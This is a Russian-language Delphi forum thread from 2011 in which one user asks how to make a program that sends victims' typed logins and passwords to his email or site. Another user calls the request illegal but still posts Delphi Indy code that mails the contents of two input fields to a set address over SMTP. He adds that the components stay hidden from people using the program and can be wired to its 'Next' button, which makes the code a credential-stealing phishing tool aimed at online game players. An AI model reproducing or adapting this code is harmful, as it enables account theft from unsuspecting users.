delphi-lubitel

Добро пожаловать на наш портал

На нашем сайте вы найдете множество статей на разные тематики, а так же сможете найти и скачать много интересного Рекомендуем Вам добавить Наш сайт в закладки, а также подписаться на RSS ленту, чтобы не пропускать интересных новостей.
Стартовая Избранное Главная Контакты Карта сайта
Инфо
Сниффер - Форум
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: winxaker  
Форум » Программирование » Вопросы по Delphi » Сниффер (Не законно!)
Сниффер
MarkrerДата: Суббота, 23.07.2011, 22:34 | Сообщение # 1
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
скажите пожалуйста что сделать что бы когда человек водит в строку логин,пароль и нажимает далее что бы логин и пас приходил мне на маил или на мой сайт...



Если можно по по подробней объяснить...

Спс
 
AiX2011Дата: Суббота, 23.07.2011, 23:04 | Сообщение # 2
Лейтенант
Группа: Пользователи
Сообщений: 51
Награды: 1
Репутация: 2
Статус: Offline
Ну для начала это не законно и уголовно наказуемо.... Не хорошо играков обманывать, я сам в кросс файр геймю biggrin
Подумаем над твоей темой

Добавлено (23.07.2011, 23:01)
---------------------------------------------
Кидаем на форму компонент IdSMTP со вкладки Indy Client
Кидаем на форму компонент IdMessage со вкладки Indy Misc
Кидаем на форму компонент Button со вкладки Standard
Кликаем по компоненту Button 2 раза тем самым создав на нем обработчик событий onClick

procedure TForm1.Button1Click(Sender: TObject);
var
MailSend:TidMessage;
MailSend := TIdMessage.Create(Form1);
begin
MailSend.Body.Add(edit1.Text + ';' + edit2.Text); //текст сообщения равен текст первого эдита потом точка с запятой и текст второго эдита
MailSend.From.Text := '<mail@mail.ru>'; //мыло отправителя
MailSend.Recipients.Add;
MailSend.Recipients.Items[0].Text := '<mail2@mail.ru>'; //мыло получателя
MailSend.Subject := 'Themes'; //Тема письма (писать по английски)

IdSMTP1.AuthenticationType := atLogin; //показываем что авторизовываемся
IdSMTP1.Host := 'smtp.mail.ru'; // указываем хост например (smtp.yandex.ru)
IdSMTP1.Username := 'login'; // логин
IdSMTP1.Password := 'password'; // пароль
IdSMTP1.Connect(); // подключаемся
if IdSMTP1.Connected then // если подключились то идем дальше
begin
IdSMTP1.Send(MailSend); // отправляем сообщение
end;
IdSMTP1.Disconnect; // после отправки отключаемся
end;

Если бы на форуме посмотрел нашел бы эту тему, автор Toha.

Там все данные(мыла пассы и тп) сам вставишь)

Добавлено (23.07.2011, 23:04)
---------------------------------------------
Да и еще подобные вопросы задают не в эту тему, а вот сюда Вопросы по Delphi


Сайт посвященный программированию в среде Delphi. Вопросы по Delphi и HTML на форуме
 
MarkrerДата: Суббота, 23.07.2011, 23:16 | Сообщение # 3
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
Quote (AiX2011)
Не хорошо играков обманывать, я сам в кросс файр геймю

Я не для того что бы акки забирать...у меня у самого перс Лейтенант и мне этого достаточно)))

А для того что бы нубы поняли что это не чит а взлом акка и не писали в чат "дайте чит на крд!!!плиз,плиз,плиз..."

Quote (AiX2011)
Кидаем на форму компонент IdSMTP со вкладки Indy Client
Кидаем на форму компонент IdMessage со вкладки Indy Misc
Кидаем на форму компонент Button со вкладки Standard
Кликаем по компоненту Button 2 раза тем самым создав на нем обработчик событий onClick

procedure TForm1.Button1Click(Sender: TObject);
var
MailSend:TidMessage;
MailSend := TIdMessage.Create(Form1);
begin
MailSend.Body.Add(edit1.Text + ';' + edit2.Text); //текст сообщения равен текст первого эдита потом точка с запятой и текст второго эдита
MailSend.From.Text := '<mail@mail.ru>'; //мыло отправителя
MailSend.Recipients.Add;
MailSend.Recipients.Items[0].Text := '<mail2@mail.ru>'; //мыло получателя
MailSend.Subject := 'Themes'; //Тема письма (писать по английски)

IdSMTP1.AuthenticationType := atLogin; //показываем что авторизовываемся
IdSMTP1.Host := 'smtp.mail.ru'; // указываем хост например (smtp.yandex.ru)
IdSMTP1.Username := 'login'; // логин
IdSMTP1.Password := 'password'; // пароль
IdSMTP1.Connect(); // подключаемся
if IdSMTP1.Connected then // если подключились то идем дальше
begin
IdSMTP1.Send(MailSend); // отправляем сообщение
end;
IdSMTP1.Disconnect; // после отправки отключаемся
end;

Если бы на форуме посмотрел нашел бы эту тему, автор Toha.

Там все данные(мыла пассы и тп) сам вставишь)


я видел в теме одно это...но не совсем понял...

у меня там уже все сделано куда мне кидать IdSMTP,IdMessage,Button
 
AiX2011Дата: Суббота, 23.07.2011, 23:22 | Сообщение # 4
Лейтенант
Группа: Пользователи
Сообщений: 51
Награды: 1
Репутация: 2
Статус: Offline
на форму это все кидаешь. Потом кликаешь два раза по буттону и вписываешь код тот что я тебе прислал.... Компоненты IdSMTP,IdMessage не являются визуальными и отображаются только при разработке приложения, те кто будут пользоваться прогой не увидят их. А вместо бутона можешь использывать ту кнопку которая у тебя снизу. под названием "Далее"

Сайт посвященный программированию в среде Delphi. Вопросы по Delphi и HTML на форуме
 
Mr-FreemanДата: Понедельник, 31.10.2011, 21:05 | Сообщение # 5
Рядовой
Группа: Пользователи
Сообщений: 17
Награды: 0
Репутация: 0
Статус: Offline
ахахахахах взломщик фигов...... cry Хотя мне то-же пригодиться. happy
 
Mr-FreemanДата: Понедельник, 31.10.2011, 21:17 | Сообщение # 6
Рядовой
Группа: Пользователи
Сообщений: 17
Награды: 0
Репутация: 0
Статус: Offline
Люди у меня ошибка..Чё делать?
Прикрепления: 8633652.png(480.5 Kb)
 
AiX2011Дата: Среда, 02.11.2011, 13:26 | Сообщение # 7
Лейтенант
Группа: Пользователи
Сообщений: 51
Награды: 1
Репутация: 2
Статус: Offline
Какая то у тебя Delphi странная... Снизу есть поле со строками, где указывается тип ошибки, сделай скриншот с полным обработчиком событий... Что бы все окно кода было видно нормально.

Сайт посвященный программированию в среде Delphi. Вопросы по Delphi и HTML на форуме
 
Mr-FreemanДата: Среда, 02.11.2011, 16:15 | Сообщение # 8
Рядовой
Группа: Пользователи
Сообщений: 17
Награды: 0
Репутация: 0
Статус: Offline
Вот....
 
Форум » Программирование » Вопросы по Delphi » Сниффер (Не законно!)
  • Страница 1 из 1
  • 1
Поиск:

 
Хостинг от uCoz | Адаптировал Grey200009 Число ответ: 57432